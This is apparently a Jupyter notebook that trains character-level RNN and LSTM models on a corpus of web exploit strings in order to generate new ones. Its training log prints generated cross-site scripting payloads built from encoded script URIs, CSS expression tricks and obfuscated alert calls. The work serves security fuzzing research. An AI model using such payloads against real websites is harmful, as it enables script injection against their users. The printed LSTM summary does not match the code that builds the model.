# Imports 
This project is implemented using tensorflow vesion 2.7.0 and numpy version 1.19.5 

In [2]:
import sys 
import random 
import numpy as np 
import tensorflow as tf
from tensorflow.keras import layers, models  

print(tf.__version__)
print(np.__version__)

2.7.0
1.19.5


# Data Preprocessing 
Once we load our data we will create a vocabulary which is composed unique characters from the data. One thing to note here is that these exploits will include a number of special characters and we have to keep them in there ans sometimes even upper case letter. They are part of the more diversified exploit content. We just load the data and vectorize its content
### Vectorization
Inorder to feed our data we have to convert the string form of the data into numeric tensors or numeric vectors. for this we can use StringLookup layer form tensorflow or do it manually using simple dictionary operations. Inorder to convert generated numeric IDs into human readable form we can use the StringLookup layer of tensorflow with invert parameter set to True.      

```
# without tensorflow 
chars_to_indices = tf.keras.layers.StringLookup(
    vocabulary=list(vocabulary), mask_token=None)

indices_to_chars = tf.keras.layers.StringLookup(
    vocabulary=chars_to_indices.get_vocabulary(), invert=True, mask_token=None
)
```

# Character Mappings 
mapping character is just giving a unique id to a character from the data we just loaded ofcourse for those which are unique. This is important later when we feed the data into our model. The model will use the ids to map each character thats coming through the sequence.  

In [6]:
# Read our data 
data = ""
with open("./file.txt", 'r', encoding='utf-8') as f:
  data += f.read()

# Create  our vocabulary 
vocabulary = sorted(list(set(data)))
print(f"Length our vocabulary {len(vocabulary)}")

# Create mapping chars to indices and reverse indices to chars 
chars_to_indices = dict((c, i) for i, c in enumerate(vocabulary))
indices_to_chars = dict((i, c) for i, c in enumerate(vocabulary))

Length our vocabulary 115


# Split the data into training examples and targets 

The data is splitted into smaller sequences of a fixed length which makes all input sequences the same length and one character shifted to the right. The shifted character will be the target value which we want to predict.

```
# with Tensorflow
# get the mapping of all characters from our input file 
vector_data = chars_to_indices(tf.strings.unicode_split(data, 'UTF-8')) 

vector_dataset = tf.data.Dataset.from_tensor_slices(vector_data)
```



# Create a batch of characters 
the batch method of tensorflow creates a sequence of characters with desired length in this case the sequence length is set to 200



```
# Tensorflow implementation 

seq_length = 200
sequences = vector_dataset.batch(seq_length+1, drop_remainder=True)

# utility function to split input sequence into sample and target 
def split_sequence(sequence):
  in_seq = sequence[:-1]
  target_seq = sequence[1:]
  return in_seq, target_seq

# then create dataset of input sample and target over the entire sequence 
new_dataset = sequences.map(split_sequence)

```



In [10]:
seq_length = 200
step = 3
sequences = []
next_chars = []
for i in range(0, len(data) - seq_length, step):
    sequences.append(data[i: i + seq_length])
    next_chars.append(data[i + seq_length])

# Create One-Hot-Encoding matrix for X and Y

After the sequences are created we want to make sure that these sequences are in the right form for our model by encoding them. One-Hot-Encoding scheme is used where each character i from our vocabulary is represented in the form of binary 0 and 1. To denore the i-th word from our vector, the value at the i-th element is set to 1 where all other values are set to 0.

One thing to note here the X stores encode form of a sequence which is shifted by one and the y store the shifted character to represent the next incoming character from the input X sequence. As an example 



```
+----------------------------------------------+-----+
| [', ;, a, =, p, r, o, m, p, t, a, (, ), / ]  | [/] |
+----------------------------------------------+-----+

# or as a hello
+--------------+-------+
|      X       |   Y   |
+--------------+-------+
| [h, e, l, l] | [o]   |
| [e, l, l, o] | [ ]   |
| [l, l, o,  ] | [i]   |
| [l, o,  , i] | [n]   |
| ...          | ...   |
+--------------+-------+
```



In [11]:
x = np.zeros((len(sequences), seq_length, len(vocabulary)), dtype=np.bool)
y = np.zeros((len(sequences), len(vocabulary)), dtype=np.bool)
for i, sequence in enumerate(sequences):
    for t, char in enumerate(sequence):
        x[i, t, chars_to_indices[char]] = 1
    y[i, chars_to_indices[next_chars[i]]] = 1

# Building the model 

In [23]:
vocab_length = len(vocabulary) # 116
embedding_dimension = 256 
units = 128

def build_rnn_model():
  model = models.Sequential()
  model.add(layers.SimpleRNN(units, input_shape=(seq_length, vocab_length), return_sequences=True))
  model.add(layers.Dropout(0.2))
  model.add(layers.SimpleRNN(units))
  model.add(layers.Dropout(0.2))
  model.add(layers.Dense(vocab_length, activation='softmax'))
  model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
  return model 


def build_lstm_model():
  model = models.Sequential()
  model.add(layers.LSTM(units, input_shape=(seq_length, vocab_length), return_sequences=True))
  model.add(layers.Dropout(0.2))
  model.add(layers.LSTM(units))
  model.add(layers.Dropout(0.2))
  model.add(layers.Dense(vocab_length, activation='softmax'))
  model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
  return model

In [24]:
rnn_model = build_rnn_model()
rnn_model.summary()

Model: "sequential_5"
_________________________________________________________________
 Layer (type)                Output Shape              Param #   
 simple_rnn_5 (SimpleRNN)    (None, 200, 128)          31232     
                                                                 
 dropout_11 (Dropout)        (None, 200, 128)          0         
                                                                 
 simple_rnn_6 (SimpleRNN)    (None, 128)               32896     
                                                                 
 dropout_12 (Dropout)        (None, 128)               0         
                                                                 
 dense_4 (Dense)             (None, 115)               14835     
                                                                 
Total params: 78,963
Trainable params: 78,963
Non-trainable params: 0
_________________________________________________________________


In [25]:
lstm_model = build_lstm_model()
lstm_model.summary()

Model: "sequential_6"
_________________________________________________________________
 Layer (type)                Output Shape              Param #   
 lstm_6 (LSTM)               (None, 200, 128)          124928    
                                                                 
 dropout_13 (Dropout)        (None, 200, 128)          0         
                                                                 
 lstm_7 (LSTM)               (None, 200, 128)          131584    
                                                                 
 dropout_14 (Dropout)        (None, 200, 128)          0         
                                                                 
 lstm_8 (LSTM)               (None, 700)               2321200   
                                                                 
 dropout_15 (Dropout)        (None, 700)               0         
                                                                 
 dense_5 (Dense)             (None, 115)              

In [28]:
import os
# Directory where the checkpoints will be saved
checkpoint_dir = './training_checkpoints'
# Name of the checkpoint files
checkpoint_prefix = os.path.join(checkpoint_dir, "ckpt_{epoch}")

checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
    filepath=checkpoint_prefix,
    save_weights_only=True)

def sample(preds, temperature=1.0):
    # helper function to sample an index from a probability array
    preds = np.asarray(preds).astype('float64')
    preds = np.log(preds) / temperature
    exp_preds = np.exp(preds)
    preds = exp_preds / np.sum(exp_preds)
    probas = np.random.multinomial(1, preds, 1)
    return np.argmax(probas)


class SampleExploit(tf.keras.callbacks.Callback):
    def on_epoch_end(self, batch, logs={}):
        start_index = random.randint(0, len(data) - seq_length - 1)

        for diversity in [0.5, 1.2]:
            generated = ''
            sentence = data[start_index: start_index + seq_length]
            generated += sentence
            sys.stdout.write(generated)
            for i in range(200):
                x_pred = np.zeros((1, seq_length, len(vocabulary)))
                for t, char in enumerate(sentence):
                    x_pred[0, t, chars_to_indices[char]] = 1.
                preds = rnn_model.predict(x_pred, verbose=0)[0]
                next_index = sample(preds, diversity)
                next_char = indices_to_chars[next_index]
                generated += next_char
                sentence = sentence[1:] + next_char
                sys.stdout.write(next_char)
                sys.stdout.flush()
            print()



In [29]:
EPOCHS = 20 
history = rnn_model.fit(x, y , epochs=EPOCHS, batch_size=80, callbacks=[SampleExploit()])

Epoch 1/20
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script>
<script>
<script>
<img src=&#x0000\&#1000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011)&#x0001)&
61' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script=<nlotOlaersars(j8'asct(#))<><Z073m><)V<iSC IPT>
"lMDIdDSC2LC=&#1!6C%XB%4Q%2c="aalert(')>></sciipt>"//m'
\4.;v vagt&lerSIC;-UoE0NPC=,IYn^;alert(17" ivComc\R8C=8%58;%T/&qksa0&#180>&#10AA>\0x7s\xck&lx:"
Epoch 2/20
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)</script>
"`'</script src="x s="><script>
<act ht l er=" ontrale="javascript:alert(1)"></srlert>
<script x="javascript:al

# Word Embedding 
Another way to represent the data to our network will be using word embedding. the process will be almost similar expect instead using One-Hot-Encoding we will use the Embedding layer of tensorflow.

In [None]:
# Create our vocabulary 
vocabulary = sorted(set(data))

In [None]:
# Vectorize: conver the string characters to numerical form 
chars_to_indices = tf.keras.layers.StringLookup(
    vocabulary=list(vocabulary), mask_token=None
)

# To decode indices to characters vocabulary used to convert characters to indices
# is used this will insure that unknown characters which do not exist in the 
# vocabulary are repsented as they are. 
indices_to_chars = tf.keras.layers.StringLookup(
    vocabulary=chars_to_indices.get_vocabulary(), invert=True, mask_token=None
)

# Utility function to join characters and form the exploit 
def exploit_from_indices(indices):
  return tf.strings.reduce_join(indices_to_chars(indices), axis=-1)

# Preparing data for prediction 
As the previous implementation the data will be divided into input sequence and target characters to train our model. 

In [None]:
# Get all indices from and create a numerical dataset of sequences 
indices = chars_to_indices(tf.string.unicode_split(data, 'UTF-8'))
indices_dataset = tf.data.Dataset.from_tensor_slices(indices)

# Example 
for indices in indices_dataset.take(10):
  print(indices_to_chars(indices).numpy().decode('utf-8'))

In [None]:
# Create sequences of a fixed length 
seq_length = 200
sample_per_epoch = len(data) // (seq_length+1)
sequences = indices_dataset.batch(seq_length+1, drop_remainder=True)
# Example
for seq in sequences.take(1):
  print(indices_to_chars(seq))